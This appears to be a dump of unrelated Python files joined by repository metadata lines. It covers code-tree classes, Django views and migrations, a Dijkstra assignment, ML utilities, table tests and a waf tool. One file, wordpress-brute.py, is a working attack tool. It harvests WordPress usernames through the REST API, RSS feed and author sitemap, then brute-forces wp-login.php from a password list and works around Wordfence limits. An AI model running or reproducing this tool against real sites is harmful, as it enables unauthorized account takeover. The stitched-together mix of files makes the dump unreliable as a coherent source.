Some languages also allow a `finally` block that is executed after
the other blocks (either the `try` block, or a `catch` block, when
an exception is raised and handled).
"""
def __init__(self, scope, parent):
"""Constructor for try block structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.body = CodeBlock(scope, self, explicit=True)
self.catches = []
self.finally_body = CodeBlock(scope, self, explicit=True)
def _set_body(self, body):
"""Set the main body for try block structure."""
assert isinstance(body, CodeBlock)
self.body = body
def _add_catch(self, catch_block):
"""Add a catch block (exception variable declaration and block)
to this try block structure.
"""
assert isinstance(catch_block, self.CodeCatchBlock)
self.catches.append(catch_block)
def _set_finally_body(self, body):
"""Set the finally body for try block structure."""
assert isinstance(body, CodeBlock)
self.finally_body = body
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body._children():
yield codeobj
for catch_block in self.catches:
for codeobj in catch_block._children():
yield codeobj
for codeobj in self.finally_body._children():
yield codeobj
def __len__(self):
"""Return the length of all blocks combined."""
n = len(self.body) + len(self.catches) + len(self.finally_body)
n += sum(map(len, self.catches))
return n
def __repr__(self):
"""Return a string representation of this object."""
return 'try {} {} {}'.format(self.body, self.catches,
self.finally_body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = spaces + 'try:\n'
pretty += self.body.pretty_str(indent=indent + 2)
for block in self.catches:
pretty += '\n' + block.pretty_str(indent)
if len(self.finally_body) > 0:
pretty += '\n{}finally:\n'.format(spaces)
pretty += self.finally_body.pretty_str(indent=indent + 2)
return pretty
class CodeCatchBlock(CodeStatement, CodeStatementGroup):
"""Helper class for catch statements within a try-catch block."""
def __init__(self, scope, parent):
"""Constructor for catch block structures."""
CodeStatement.__init__(self, scope, parent)
self.declarations = None
self.body = CodeBlock(scope, self, explicit=True)
def _set_declarations(self, declarations):
"""Set declarations local to this catch block."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_body(self, body):
"""Set the main body of the catch block."""
assert isinstance(body, CodeBlock)
self.body = body
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.declarations, CodeStatement):
yield self.declarations
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return 'catch ({}) {}'.format(self.declarations, self.body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
decls = ('...' if self.declarations is None
else self.declarations.pretty_str())
body = self.body.pretty_str(indent=indent + 2)
pretty = '{}catch ({}):\n{}'.format(spaces, decls, body)
return pretty
###############################################################################
# Helpers
###############################################################################
def pretty_str(something, indent=0):
"""Return a human-readable string representation of an object.
Uses `pretty_str` if the given value is an instance of
`CodeEntity` and `repr` otherwise.
Args:
something: Some value to convert.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if isinstance(something, CodeEntity):
return something.pretty_str(indent=indent)
else:
return (' ' * indent) + repr(something)
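def _example_pretty_str_helper():
    # Illustrative sketch (added for documentation; not part of the original
    # module). pretty_str() dispatches to CodeEntity.pretty_str() and falls
    # back to repr() for plain values, so literals stand in for full argument
    # expressions here; None scope/parent is assumed to be acceptable.
    call = CodeFunctionCall(None, None, 'min', 'int')
    call.arguments = (3, 5)  # set directly to keep the sketch self-contained
    assert pretty_str(call) == 'min(3, 5)'
    assert pretty_str('x', indent=2) == "  'x'"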
| 1.765625 | 2 |
api/views/todo_views.py | felipe-menelau/todo-list-web | 0 | 5590 | from django.contrib.auth.models import User
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from api.serializers import TODOListSerializer
from api.models import TODOList
class TODOListViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated]
serializer_class = TODOListSerializer
def get_queryset(self):
        user = self.request.user
        return TODOList.objects.filter(owner=user).order_by('created_at')
def create(self, request, *args, **kwargs):
request.data['owner'] = request.user.id
return super(self.__class__, self).create(request, *args, **kwargs)
| 2.015625 | 2 |
Python/Tests/TestData/ProjectHomeProjects/Subfolder/ProgramB.py | techkey/PTVS | 404 | 5591 | # ProgramB.py
print('Hello World')
| 1.171875 | 1 |
donation/migrations/0043_auto_20180109_0012.py | effective-altruism-australia/donation-portal | 1 | 5592 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def copy_existing_referrals_into_new_field(apps, schema_editor):
Pledge = apps.get_model('donation', 'Pledge')
Referral = apps.get_model('donation', 'Referral')
reasons = Pledge.objects.values_list('how_did_you_hear_about_us', flat=True).distinct()
for reason in reasons:
if reason: # Filter out None and u''
Referral.objects.create(reason=reason)
for pledge in Pledge.objects.all():
reason = pledge.how_did_you_hear_about_us
if reason:
pledge.how_did_you_hear_about_us_db = Referral.objects.get(reason=reason)
pledge.save()
class Migration(migrations.Migration):
dependencies = [
('donation', '0042_amend_donation_view'),
]
operations = [
migrations.CreateModel(
name='Referral',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reason', models.CharField(max_length=256)),
],
),
migrations.AddField(
model_name='pledge',
name='how_did_you_hear_about_us_db',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, verbose_name='How did you hear about us?', blank=True, to='donation.Referral', null=True),
),
migrations.RunPython(copy_existing_referrals_into_new_field)
]
| 1.867188 | 2 |
python/is_even.py | c1m50c/twitter-examples | 0 | 5593 |
def is_even(i: int) -> bool:
if i == 1:
return False
elif i == 2:
return True
elif i == 3:
return False
elif i == 4:
return True
elif i == 5:
...
# Never do that! Use one of these instead...
is_even = lambda i : i % 2 == 0
is_even = lambda i : not i & 1
is_odd = lambda i : not is_even(i) | 3.5 | 4 |
wordpress-brute.py | RandomRobbieBF/wordpress-bf | 1 | 5594 |
#!/usr/bin/env python
#
# Wordpress Bruteforce Tool
#
# By @random_robbie
#
#
import requests
import json
import sys
import argparse
import re
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL")
parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File")
args = parser.parse_args()
url = args.url
passfile = args.file
http_proxy = ""
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
"ftp" : http_proxy
}
# Grab Wordpress Users via Wordpress JSON api
def grab_users_api(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict)
if 'rest_user_cannot_view' in response.text:
print ("[-] REST API Endpoint Requires Permissions [-]")
return False
if response.status_code == 404:
print ("[-] Rest API Endpoint returns 404 Not Found [-]")
return False
elif response.status_code == 200:
jsonstr = json.loads(response.content)
return jsonstr
# Grab Wordpress Users via Sitemap
def grab_users_sitemap(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
return response.text
# Grab Wordpress Users via RSS Feed
def grab_users_rssfeed(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
if "dc:creator" in response.text:
return response.text
# Check we can get to wp-admin login.
def check_wpadmin(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict)
if "Powered by WordPress" in response.text:
if "wp-submit" in response.text:
if "reCAPTCHA" not in response.text:
return True
else:
return False
else:
return False
else:
return False
# Check URL is wordpress
def check_is_wp(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict)
if "wp-content" in response.text:
return True
else:
return False
# Check if wordfence is installed as this limits the logins to 20 per ip
def check_wordfence(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict)
if "Wordfence Security - Firewall & Malware Scan" in response.text:
return True
else:
return False
# Test the logins
def test_login (url,user,password,cnt,attempts):
if str(cnt) == attempts:
print("[-] Stopping as Wordfence will block your IP [-]")
sys.exit(0)
paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"}
headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"wordpress_test_cookie":"WP+Cookie+check"}
response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False)
if response.status_code == 503:
print("[-] Website is giving 503 HTTP Status [-]")
sys.exit(0)
if response.status_code == 502:
print("[-] Website is giving 502 HTTP Status [-]")
sys.exit(0)
if response.status_code == 403:
print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]")
sys.exit(0)
if "Google Authenticator code" in response.text:
print("[-] 2FA is enabled Sorry [-]")
sys.exit(0)
if "wordpress_logged_in" in response.headers['Set-Cookie']:
print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]")
text_file = open("found.txt", "a")
text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n")
text_file.close()
sys.exit(0)
else:
print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]")
cnt += 1
return cnt
def count_pass(passfile):
count = 0
with open(passfile, 'r') as f:
for line in f:
count += 1
f.close()
return str(count)
# Dont no body like dupes.
def remove_dupes():
lines_seen = set()
outfile = open("users.txt", "w")
for line in open("rssusers.txt", "r"):
if line not in lines_seen:
outfile.write(line)
lines_seen.add(line)
outfile.close()
def attack_restapi(url,attempts,userdata,passfile):
for id in userdata:
user = id['slug']
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
def attack_rssfeed(url,attempts,userdata,passfile):
users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata)
if os.path.exists("rssusers.txt"):
os.remove("rssusers.txt")
if os.path.exists("users.txt"):
os.remove("users.txt")
for user in users:
u = user.replace("[CDATA[","")
text_file = open("rssusers.txt", "a")
text_file.write(""+str(u)+"\n")
text_file.close()
remove_dupes()
with open("users.txt", 'r') as f:
for line in f:
user = line.strip()
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as b:
for line in b:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
b.close()
def attack_sitemap(url,attempts,userdata,passfile):
auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata)
for user in auth:
thisuser = user[1]
h = thisuser.split('/')
user = h[4]
cnt = 1
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
f.close()
# Time For Some Machine Learning Quality IF statements.
def basic_checks(url):
if check_is_wp(url):
if check_wpadmin(url):
return True
else:
return False
else:
return False
if basic_checks(url):
print("[+] Confirmed Wordpress Website [+]")
else:
print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]")
sys.exit(0)
if os.path.isfile(passfile) and os.access(passfile, os.R_OK):
print("[+] Password List Used: "+passfile+" [+]")
else:
print("[-] Either the file is missing or not readable [-]")
sys.exit(0)
# Method Value for which method to enumerate users from
method = "None"
attempts = "None"
# Which method to use for enumeration
if grab_users_api(url):
print("[+] Users found via Rest API [-]")
method = "restapi"
if grab_users_rssfeed(url) and method == "None":
print("[+] Users found via RSS Feed [+]")
method = "rss"
if grab_users_sitemap(url) and method == "None":
print("[+] Users found via Authors Sitemap [-]")
method = "sitemap"
if method == "None":
print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]")
sys.exit(0)
if check_wordfence(url):
print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]")
attempts = "20"
# Kick off Parsing and attacking
if method == "restapi":
userdata = grab_users_api(url)
attack_restapi(url,attempts,userdata,passfile)
if method == "rss":
userdata = grab_users_rssfeed(url)
attack_rssfeed(url,attempts,userdata,passfile)
if method == "sitemap":
userdata = grab_users_sitemap(url)
attack_sitemap(url,attempts,userdata,passfile)
| 2.5 | 2 |
graph_search/week2/assignment_dijkstra_shortest_paths.py | liaoaoyuan97/standford_algorithms_specialization | 0 | 5595 | import heapq
import time
from os import path
from math import floor
class Heap:
def __init__(self):
self.size = 0
self.array = []
self.v2index_map = {}
def __get_parent_index(self, idx):
return int(floor((idx - 1) / 2))
def __get_left_child_index(self, idx):
return 2 * idx + 1
def __get_right_child_index(self, idx):
return 2 * idx + 2
def __swap_value(self, i, j):
t = self.array[i]
self.v2index_map[t[0]] = j
self.v2index_map[self.array[j][0]] = i
self.array[i] = self.array[j]
self.array[j] = t
def __bubble_up(self, idx):
parent_idx = self.__get_parent_index(idx)
while parent_idx >= 0:
if self.array[parent_idx][1] <= self.array[idx][1]:
break
self.__swap_value(parent_idx, idx)
idx = parent_idx
parent_idx = self.__get_parent_index(idx)
def __bubble_down(self, idx):
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
while left_idx < self.size or right_idx < self.size:
min_idx = left_idx
if left_idx >= self.size or (right_idx < self.size and self.array[right_idx][1] < self.array[left_idx][1]):
min_idx = right_idx
if self.array[idx][1] < self.array[min_idx][1]:
break
self.__swap_value(idx, min_idx)
idx = min_idx
left_idx = self.__get_left_child_index(idx)
right_idx = self.__get_right_child_index(idx)
def get_vertex_key(self, v_id):
return self.array[self.v2index_map[v_id]][1]
def pop(self):
if self.size < 1:
raise IndexError
min_node = self.array[0]
self.size = self.size - 1
self.__swap_value(0, self.size)
self.array.pop()
if self.size > 1:
self.__bubble_down(0)
del self.v2index_map[min_node[0]]
return min_node
def insert(self, node):
self.array.append(node)
self.v2index_map[node[0]] = self.size
self.size = self.size + 1
if self.size > 1:
self.__bubble_up(self.size - 1)
def modify_key(self, v_id, update_val):
idx = self.v2index_map[v_id]
self.array[idx] = (v_id, update_val)
parent_idx = self.__get_parent_index(idx)
if parent_idx >= 0 and self.array[idx][1] < self.array[parent_idx][1]:
self.__bubble_up(idx)
else:
self.__bubble_down(idx)
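def _example_heap_usage():
    # Illustrative sketch (added for clarity; not part of the original
    # assignment). The custom Heap stores (vertex_id, key) pairs and supports
    # decrease-key through modify_key(), which the Dijkstra variant below
    # relies on.
    h = Heap()
    h.insert((1, 10))
    h.insert((2, 4))
    h.insert((3, 7))
    h.modify_key(3, 2)                 # decrease vertex 3's key from 7 to 2
    assert h.pop() == (3, 2)           # smallest key is popped first
    assert h.get_vertex_key(1) == 10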
def read_graph(filename):
graph = dict()
with open(path.join('.', filename), 'r') as f:
for row in f.readlines():
edges = row.strip('\t\n').split('\t')
s = int(edges[0])
graph[s] = []
for i in range(1, len(edges)):
edge = edges[i].split(',')
graph[s].append((int(edge[0]), int(edge[1])))
return graph
def get_shortest_paths_heapq(graph):
heap = []
heapq.heappush(heap, (0, 1)) # (dj_score, vertex_id)
distances = {i: 1000000 for i in graph}
distances[1] = 0
X = []
while heap:
cur_distance, cur_v = heapq.heappop(heap)
if cur_distance > distances[cur_v]:
continue
# added to X
X.append(cur_v)
for neighbor, weight in graph[cur_v]:
dj_score = cur_distance + weight
if dj_score < distances[neighbor]:
distances[neighbor] = dj_score
heapq.heappush(heap, (dj_score, neighbor))
return distances, X
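def _example_heapq_dijkstra():
    # Illustrative sketch (added for clarity; not part of the original
    # assignment). It runs the heapq-based variant on a tiny adjacency-list
    # graph; vertex 1 is the fixed source, as hard-coded above.
    tiny = {1: [(2, 1), (3, 4)], 2: [(1, 1), (3, 2)], 3: [(1, 4), (2, 2)]}
    dist, settled = get_shortest_paths_heapq(tiny)
    assert dist == {1: 0, 2: 1, 3: 3}
    assert set(settled) == {1, 2, 3}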
def get_shortest_paths_self_defined_heap(graph):
heap = Heap()
heap.insert((1, 0)) # (vertex_id, dj_score)
for v in graph:
if v != 1:
heap.insert((v, 1000000))
shortest_paths = dict()
n_v = len(graph)
while len(shortest_paths) < n_v:
assert len(shortest_paths) + heap.size == n_v
cur_v, v_score = heap.pop()
shortest_paths[cur_v] = v_score
for neighbor, weight in graph[cur_v]:
dj_score = v_score + weight
# import pdb;pdb.set_trace()
if neighbor not in shortest_paths and dj_score < heap.get_vertex_key(neighbor):
heap.modify_key(neighbor, dj_score)
return shortest_paths
if __name__ == "__main__":
# test case 1, output: {1: 0, 2: 1, 3: 2, 4: 2, 5: 3, 6: 4}
# graph = {
# 1: [(6, 7), (5, 3), (2, 1), (4, 2), (3, 3)],
# 2: [(1, 1), (3, 1), (4, 1), (6, 6)],
# 3: [(1, 3), (2, 1), (6, 2)],
# 4: [(2, 1), (1, 2), (6, 5)],
# 5: [(1, 3), (6, 3)],
# 6: [(1, 7), (3, 2), (2, 6), (4, 5), (5, 3)]
# }
graph = read_graph("Dijkstra.txt")
dedup_edges = set()
for k, _ in graph.items():
for v in _:
dedup_edges.add((k, v[0], v[1]))
dedup_edges.add((v[0], k, v[1]))
assert len(dedup_edges) == sum([len(e) for e in graph.values()])
# graph = {}
# heap = Heap()
# heap.insert((1,0))
# heap.insert((2,0))
# heap.pop()
start_t = time.time()
min_distances,X = get_shortest_paths_heapq(graph)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
start_t = time.time()
    min_distances = get_shortest_paths_self_defined_heap(graph)
print(time.time() - start_t)
# print(min_distances)
e = [7, 37, 59, 82, 99, 115, 133, 165, 188, 197]
print(",".join([str(int(min_distances[i])) for i in e]))
| 3.328125 | 3 |
ssod/utils/structure_utils.py | huimlight/SoftTeacher | 604 | 5596 |
import warnings
from collections import Counter
from collections.abc import Mapping, Sequence
from numbers import Number
from typing import Dict, List
import numpy as np
import torch
from mmdet.core.mask.structures import BitmapMasks
from torch.nn import functional as F
_step_counter = Counter()
def list_concat(data_list: List[list]):
if isinstance(data_list[0], torch.Tensor):
return torch.cat(data_list)
else:
endpoint = [d for d in data_list[0]]
for i in range(1, len(data_list)):
endpoint.extend(data_list[i])
return endpoint
def sequence_concat(a, b):
if isinstance(a, Sequence) and isinstance(b, Sequence):
return a + b
else:
return None
def dict_concat(dicts: List[Dict[str, list]]):
return {k: list_concat([d[k] for d in dicts]) for k in dicts[0].keys()}
def dict_fuse(obj_list, reference_obj):
if isinstance(reference_obj, torch.Tensor):
return torch.stack(obj_list)
return obj_list
def dict_select(dict1: Dict[str, list], key: str, value: str):
flag = [v == value for v in dict1[key]]
return {
k: dict_fuse([vv for vv, ff in zip(v, flag) if ff], v) for k, v in dict1.items()
}
def dict_split(dict1, key):
group_names = list(set(dict1[key]))
dict_groups = {k: dict_select(dict1, key, k) for k in group_names}
return dict_groups
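def _example_dict_split():
    # Illustrative sketch (added for clarity; not part of the original module).
    # dict_split() groups a dict of parallel lists by the values found under
    # the given key; the field names here are made up for the demo.
    data = {"tag": ["sup", "unsup", "sup"], "score": [0.9, 0.2, 0.7]}
    groups = dict_split(data, "tag")
    assert groups["sup"] == {"tag": ["sup", "sup"], "score": [0.9, 0.7]}
    assert groups["unsup"] == {"tag": ["unsup"], "score": [0.2]}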
def dict_sum(a, b):
if isinstance(a, dict):
assert isinstance(b, dict)
return {k: dict_sum(v, b[k]) for k, v in a.items()}
elif isinstance(a, list):
assert len(a) == len(b)
return [dict_sum(aa, bb) for aa, bb in zip(a, b)]
else:
return a + b
def zero_like(tensor_pack, prefix=""):
if isinstance(tensor_pack, Sequence):
return [zero_like(t) for t in tensor_pack]
elif isinstance(tensor_pack, Mapping):
return {prefix + k: zero_like(v) for k, v in tensor_pack.items()}
elif isinstance(tensor_pack, torch.Tensor):
return tensor_pack.new_zeros(tensor_pack.shape)
elif isinstance(tensor_pack, np.ndarray):
return np.zeros_like(tensor_pack)
else:
warnings.warn("Unexpected data type {}".format(type(tensor_pack)))
return 0
def pad_stack(tensors, shape, pad_value=255):
tensors = torch.stack(
[
F.pad(
tensor,
pad=[0, shape[1] - tensor.shape[1], 0, shape[0] - tensor.shape[0]],
value=pad_value,
)
for tensor in tensors
]
)
return tensors
def result2bbox(result):
num_class = len(result)
bbox = np.concatenate(result)
if bbox.shape[0] == 0:
label = np.zeros(0, dtype=np.uint8)
else:
label = np.concatenate(
[[i] * len(result[i]) for i in range(num_class) if len(result[i]) > 0]
).reshape((-1,))
return bbox, label
def result2mask(result):
num_class = len(result)
mask = [np.stack(result[i]) for i in range(num_class) if len(result[i]) > 0]
if len(mask) > 0:
mask = np.concatenate(mask)
else:
mask = np.zeros((0, 1, 1))
return BitmapMasks(mask, mask.shape[1], mask.shape[2]), None
def sequence_mul(obj, multiplier):
if isinstance(obj, Sequence):
return [o * multiplier for o in obj]
else:
return obj * multiplier
def is_match(word, word_list):
for keyword in word_list:
if keyword in word:
return True
return False
def weighted_loss(loss: dict, weight, ignore_keys=[], warmup=0):
_step_counter["weight"] += 1
lambda_weight = (
lambda x: x * (_step_counter["weight"] - 1) / warmup
if _step_counter["weight"] <= warmup
else x
)
if isinstance(weight, Mapping):
for k, v in weight.items():
for name, loss_item in loss.items():
if (k in name) and ("loss" in name):
loss[name] = sequence_mul(loss[name], lambda_weight(v))
elif isinstance(weight, Number):
for name, loss_item in loss.items():
if "loss" in name:
if not is_match(name, ignore_keys):
loss[name] = sequence_mul(loss[name], lambda_weight(weight))
else:
loss[name] = sequence_mul(loss[name], 0.0)
else:
raise NotImplementedError()
return loss
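def _example_weighted_loss():
    # Illustrative sketch (added for clarity; not part of the original module).
    # weighted_loss() scales every entry whose name contains "loss" by a
    # scalar weight and zeroes entries matched by ignore_keys; plain floats
    # stand in for tensors here.
    loss = {"loss_cls": 1.0, "loss_bbox": [0.5, 0.25], "acc": 0.9}
    out = weighted_loss(loss, 0.5, ignore_keys=["bbox"])
    assert out["loss_cls"] == 0.5          # scaled by the weight
    assert out["loss_bbox"] == [0.0, 0.0]  # zeroed via ignore_keys
    assert out["acc"] == 0.9               # untouched ("loss" not in the name)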
| 2.171875 | 2 |
tests/tabular_output/test_terminaltables_adapter.py | zzl0/cli_helpers | 0 | 5597 | # -*- coding: utf-8 -*-
"""Test the terminaltables output adapter."""
from __future__ import unicode_literals
from textwrap import dedent
import pytest
from cli_helpers.compat import HAS_PYGMENTS
from cli_helpers.tabular_output import terminaltables_adapter
if HAS_PYGMENTS:
from pygments.style import Style
from pygments.token import Token
def test_terminal_tables_adapter():
"""Test the terminaltables output adapter."""
data = [['abc', 1], ['d', 456]]
headers = ['letters', 'number']
output = terminaltables_adapter.adapter(
iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
+---------+--------+
| letters | number |
+---------+--------+
| abc | 1 |
| d | 456 |
+---------+--------+''')
@pytest.mark.skipif(not HAS_PYGMENTS, reason='requires the Pygments library')
def test_style_output_table():
"""Test that *style_output_table()* styles the output table."""
class CliStyle(Style):
default_style = ""
styles = {
Token.Output.TableSeparator: '#ansired',
}
headers = ['h1', 'h2']
data = [['观音', '2'], ['Ποσειδῶν', 'b']]
style_output_table = terminaltables_adapter.style_output_table('ascii')
style_output_table(data, headers, style=CliStyle)
output = terminaltables_adapter.adapter(iter(data), headers, table_format='ascii')
assert "\n".join(output) == dedent('''\
\x1b[31;01m+\x1b[39;00m''' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m h1 \x1b[31;01m|\x1b[39;00m''' +
''' h2 \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'''\x1b[31;01m+\x1b[39;00m
\x1b[31;01m|\x1b[39;00m 观音 \x1b[31;01m|\x1b[39;00m''' +
''' 2 \x1b[31;01m|\x1b[39;00m
\x1b[31;01m|\x1b[39;00m Ποσειδῶν \x1b[31;01m|\x1b[39;00m''' +
''' b \x1b[31;01m|\x1b[39;00m
''' + '\x1b[31;01m+\x1b[39;00m' + (
('\x1b[31;01m-\x1b[39;00m' * 10) +
'\x1b[31;01m+\x1b[39;00m' +
('\x1b[31;01m-\x1b[39;00m' * 4)) +
'\x1b[31;01m+\x1b[39;00m')
| 2.5625 | 3 |
dev/Tools/build/waf-1.7.13/waflib/extras/fc_xlf.py | jeikabu/lumberyard | 1,738 | 5598 |
#! /usr/bin/env python
# encoding: utf-8
# harald at klimachs.de
import re
from waflib import Utils,Errors
from waflib.Tools import fc,fc_config,fc_scan
from waflib.Configure import conf
from waflib.Tools.compiler_fc import fc_compiler
fc_compiler['aix'].insert(0, 'fc_xlf')
@conf
def find_xlf(conf):
"""Find the xlf program (will look in the environment variable 'FC')"""
fc = conf.find_program(['xlf2003_r', 'xlf2003', 'xlf95_r', 'xlf95', 'xlf90_r', 'xlf90', 'xlf_r', 'xlf'], var='FC')
fc = conf.cmd_to_list(fc)
conf.get_xlf_version(fc)
conf.env.FC_NAME='XLF'
@conf
def xlf_flags(conf):
v = conf.env
v['FCDEFINES_ST'] = '-WF,-D%s'
v['FCFLAGS_fcshlib'] = ['-qpic=small']
v['FCFLAGS_DEBUG'] = ['-qhalt=w']
v['LINKFLAGS_fcshlib'] = ['-Wl,-shared']
@conf
def xlf_modifier_platform(conf):
dest_os = conf.env['DEST_OS'] or Utils.unversioned_sys_platform()
xlf_modifier_func = getattr(conf, 'xlf_modifier_' + dest_os, None)
if xlf_modifier_func:
xlf_modifier_func()
@conf
def get_xlf_version(conf, fc):
"""Get the compiler version"""
cmd = fc + ['-qversion']
try:
out, err = conf.cmd_and_log(cmd, output=0)
except Errors.WafError:
conf.fatal('Could not find xlf %r' % cmd)
for v in (r"IBM XL Fortran.* V(?P<major>\d*)\.(?P<minor>\d*)",):
version_re = re.compile(v, re.I).search
match = version_re(out or err)
if match:
k = match.groupdict()
conf.env['FC_VERSION'] = (k['major'], k['minor'])
break
else:
conf.fatal('Could not determine the XLF version.')
def configure(conf):
conf.find_xlf()
conf.find_ar()
conf.fc_flags()
conf.fc_add_flags()
conf.xlf_flags()
conf.xlf_modifier_platform()
| 1.96875 | 2 |
tutorials/create_table/tests.py | MeGustas-5427/SQL_Tutorials | 13 | 5599 | #!/usr/bin/python3
# -*- coding:utf-8 -*-
# __author__ = '__MeGustas__'
from django.test import TestCase
from django.db import connection
from tutorials.create_table.models import *
# Create your tests here.
class TestHealthFile(TestCase):
def setUp(self):
cursor = connection.cursor()
# Populate Customers table
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000001', 'Village Toys', '200 Maple Lane', 'Detroit', 'MI', '44444', 'USA', '<NAME>', '<EMAIL>');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
VALUES('1000000002', 'Kids Place', '333 South Lake Drive', 'Columbus', 'OH', '43333', 'USA', 'Michelle Green');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000003', 'Fun4All', '1 Sunny Place', 'Muncie', 'IN', '42222', 'USA', '<NAME>', '<EMAIL>');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \
VALUES('1000000004', 'Fun4All', '829 Riverside Drive', 'Phoenix', 'AZ', '88888', 'USA', '<NAME>', '<EMAIL>');")
cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \
VALUES('1000000005', 'The Toy Store', '4545 53rd Street', 'Chicago', 'IL', '54545', 'USA', '<NAME>');")
# Populate Vendors table
cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \
VALUES('BRS01','Bears R Us','123 Main Street','Bear Town','MI','44444', 'USA');")
